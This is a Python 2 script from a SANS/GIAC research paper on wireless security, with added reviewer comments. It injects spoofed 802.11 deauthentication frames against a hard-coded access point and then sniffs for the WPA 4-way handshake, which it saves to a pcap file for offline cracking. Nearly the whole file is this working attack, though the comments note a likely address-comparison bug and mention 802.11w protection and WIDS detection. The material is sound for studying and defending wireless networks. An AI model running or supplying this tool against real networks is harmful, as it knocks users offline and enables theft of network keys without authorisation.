#!/usr/bin/env python

########################################
#
# This code is part of the SANS/GIAC Gold Paper titled
#
# Programming Wireless Security
#
# by Robin Wood (dninja@gmail.com), accepted May 2008
#
# For more information you can find the paper in the "Wireless Access" section of the
# SANS Reading Room at http://www.sans.org/reading_room/ or at www.digininja.org
#
########################################

import sys
from scapy import *
import pylorcon

# Capture interface handed to sniff() at the bottom of the file.  The injector
# below is opened on the literal "ath0" rather than on this name, so the two
# have to be changed together.
interface = "ath0"
#interface = sys.argv[1]    
# Declared but never used anywhere in this file.
eapol_packets = []
# Module-level flag.  sniffEAPOL assigns a *local* of the same name (it has no
# ``global`` statement), so this value never changes for the life of the process.
handshake_found = 0

# pylorcon injection handle on the madwifi-ng driver, put into injection plus
# monitor mode on channel 11.  The meaning of the mode strings is pylorcon's,
# not shown here; the call order is preserved as written.
injector = pylorcon.Lorcon("ath0", "madwifing")
injector.setfunctionalmode("INJECT")
injector.setmode("MONITOR")
injector.setchannel(11)

# Raw 6-byte address fields for the frame below.  These are Python 2 byte
# strings, not the "aa:bb:cc:dd:ee:ff" text form scapy exposes as
# addr1/addr2/addr3 -- relevant to the comparison done in sniffEAPOL.
destination_addr = '\xff\xff\xff\xff\xff\xff' # i.e. broadcast
bss_id_addr = '\x00\x0e\xa6\xce\xe2\x28' # hard-coded BSSID of the AP of interest
source_addr = bss_id_addr # The AP is sending the deauth

# 802.11 deauthentication management frame assembled by hand: frame control and
# duration, then addr1 = destination, addr2 = source, addr3 = BSSID, followed by
# sequence control and the 2-byte reason code that forms the body.  Under
# Python 3 these literals would be text, not bytes, so the script is Python 2 only.
# Defensive note: 802.11w (Protected Management Frames) authenticates
# deauth/disassoc frames, so a PMF-enabled network discards an unauthenticated
# frame like this; bursts of deauth frames are also a standard WIDS signature.
packet = "\xc0\x00\x3a\x01"
packet = packet + destination_addr
packet = packet + source_addr
packet = packet + bss_id_addr
packet = packet + "\x80\xcb\x07\x00";

def deauth(packet_count):
	"""Transmit the module-level ``packet`` ``packet_count`` times via ``injector``.

	``packet_count`` is used as a repetition count, so zero or a negative
	value sends nothing and a non-integer raises ``TypeError`` exactly as
	``range`` would.  Returns ``None``.
	"""
	for frame in [packet] * packet_count:
		injector.txpacket(frame)


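def normalize_mac(mac):
	"""Return *mac* with each colon-separated octet zero-padded to two lowercase hex digits.

	The original module-level statement read ``mac`` before anything had
	assigned it and therefore raised ``NameError`` on import; wrapping the
	same expression in a function keeps the normalisation and lets the
	module load.  No validation of octet count or hex content is done:
	``""`` yields ``"00"`` because ``"".zfill(2)`` pads to two characters.
	"""
	return ":".join(octet.zfill(2) for octet in mac.split(":")).lower()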

def sniffEAPOL(p):
	"""scapy ``sniff`` callback that collects EAPOL 4-way handshake frames.

	Frames without a ``WPA_key`` layer are ignored, as are frames whose
	addr3 (BSSID) does not equal the module-level ``bss_id_addr``.  For the
	rest the station address is taken from the To-DS / From-DS bits, a
	per-station record is kept in the module-level ``tracking`` dict, and
	the frame is classified as handshake message 2, 3 or 4 from its EAPOL
	Key Information bits (message 1 is never collected).  Once one station
	has all three, the stored frames are written with ``wrpcap`` to a
	hard-coded path and the process terminates via ``sys.exit(0)``.

	Always returns ``None``; it is called only for its side effects on
	``tracking`` and on the filesystem.
	"""
	if p.haslayer(WPA_key):
		layer = p.getlayer (WPA_key)

		# First, check that the access point is the one we want to target.
		# NOTE(review): bss_id_addr is a raw 6-byte string while scapy's
		# addr3 is normally the "aa:bb:cc:dd:ee:ff" text form -- confirm this
		# comparison can succeed at all.
		AP = p.addr3
		if (not AP == bss_id_addr):
			print AP
			print "not ours\n"
			return

		# Frame-control bit 0 is To-DS, bit 1 is From-DS; the station is the
		# non-BSSID end of the exchange in either direction.
		if (p.FCfield & 1): 
			# Message comes from STA
			# From DS = 0, To DS = 1
			STA = p.addr2
		elif (p.FCfield & 2): 
			# Message comes from AP
			# From DS = 1, To DS = 0
			STA = p.addr1
		else:
			# either ad-hoc or WDS (neither or both DS bits) -- not tracked
			return
	
		# Lazily create the per-station record.  dict.has_key is Python 2 only.
		if (not tracking.has_key (STA)):
			fields = {
						'frame2': None,
						'frame3': None,
						'frame4': None,
						'replay_counter': None,
						'packets': []
					}
			tracking[STA] = fields

		key_info = layer.key_info
		wpa_key_length = layer.wpa_key_length
		replay_counter = layer.replay_counter

		# EAPOL-Key "Key Information" bit masks (IEEE 802.11i): Install,
		# Key ACK and Key MIC.
		WPA_KEY_INFO_INSTALL = 64
		WPA_KEY_INFO_ACK = 128
		WPA_KEY_INFO_MIC = 256

		# check for frame 2: MIC set, ACK and Install clear, non-empty key data
		if ((key_info & WPA_KEY_INFO_MIC) and 
			(key_info & WPA_KEY_INFO_ACK == 0) and 
			(key_info & WPA_KEY_INFO_INSTALL == 0) and 
			(wpa_key_length > 0)) :
			print "Found packet 2 for ", STA
			tracking[STA]['frame2'] = 1
			tracking[STA]['packets'].append (p)

		# check for frame 3: MIC, ACK and Install all set
		elif ((key_info & WPA_KEY_INFO_MIC) and 
			(key_info & WPA_KEY_INFO_ACK) and 
			(key_info & WPA_KEY_INFO_INSTALL)):
			print "Found packet 3 for ", STA
			tracking[STA]['frame3'] = 1
			# store the replay counter for this STA; frame 4 must echo it
			tracking[STA]['replay_counter'] = replay_counter
			tracking[STA]['packets'].append (p)

		# check for frame 4: same bits as frame 2 but matched on the replay
		# counter recorded from frame 3.  Until frame 3 has been seen the
		# stored counter is None and this branch cannot match.
		elif ((key_info & WPA_KEY_INFO_MIC) and 
			(key_info & WPA_KEY_INFO_ACK == 0) and 
			(key_info & WPA_KEY_INFO_INSTALL == 0) and
			tracking[STA]['replay_counter'] == replay_counter):
			print "Found packet 4 for ", STA
			tracking[STA]['frame4'] = 1
			tracking[STA]['packets'].append (p)

		
		if (tracking[STA]['frame2'] and tracking[STA]['frame3'] and tracking[STA]['frame4']):
			print "Handshake Found\n\n"
			# Output path is hard-coded.
			wrpcap ("/var/gold/a.pcap", tracking[STA]['packets'])
			# Binds a function-local name, not the module-level flag (there is
			# no ``global`` statement); only harmless because of the exit below.
			handshake_found = 1
			sys.exit(0)

# Per-station handshake state keyed by station address; filled in by
# sniffEAPOL and reset before every sniffing round.
tracking = dict()

# Up to nine deauth-then-capture rounds; the loop index itself is unused.
for i in range(1, 10):
	print "About to deauth\n\n"
	# 50 copies of the module-level deauthentication frame.
	deauth(50)
	print "Deauth done, sniffing for EAPOL traffic"

	# reset the tracking between each sniffing attempt (rebinds the
	# module-level name that sniffEAPOL looks up on every call)
	tracking = {}

	# Blocks until 1000 frames or 30 seconds, whichever comes first; the
	# callback terminates the process itself once a full handshake is stored.
	sniff(iface=interface,prn=sniffEAPOL, count=1000, timeout=30)
	
# Reached only if no round produced a complete handshake.
print "No handshake found\n\n"